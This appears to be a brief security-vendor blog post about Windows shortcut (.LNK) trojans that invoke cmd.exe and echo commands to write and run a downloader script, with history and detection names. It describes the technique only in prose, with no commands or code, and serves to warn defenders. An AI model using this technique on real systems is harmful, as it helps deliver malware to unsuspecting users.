LNK Trojan Downloaders – when the shortcut becomes the program

Malware authors have recently revived a cunning tactic to get their malicious code onto your machine — using a Windows Shortcut file both as the attack vector and the downloading payload itself.

The use of Windows Shortcuts is nothing new for malware. Malware authors will often drop a .LNK to point to their malicious executable (e.g. Troj/Dialer-DM). But these shortcuts are still being used in their proper fashion — serving as pointers to start up some other application, where the real functionality exists.

But the LNK Trojan Downloaders I’m talking about are not your typical shortcuts. In this case, the malicious shortcut is the downloader itself. There is no need for any other malware on the system. The shortcut actually points to a standard Windows program (cmd.exe) and uses a series of echo commands to create and run a script that downloads and runs more malware. Quite innovative.

Shortcut-based malware appeared way back in January of 2005 with W32/Acespade-A — a shortcut file overwriting virus that searches for .lnk files and replaces them with a copy of itself. It seems malware authors have rediscovered this mechanism to do more than just trash your shortcuts.

So, don’t be tricked into opening a shortcut file from an untrusted source, falsely assuming the LNK must be harmless because it can only point to items already on your system. Fortunately, Sophos detects these threats with Troj/DownLnk-A, Troj/DownLnk-B and Mal/DownLnk-A.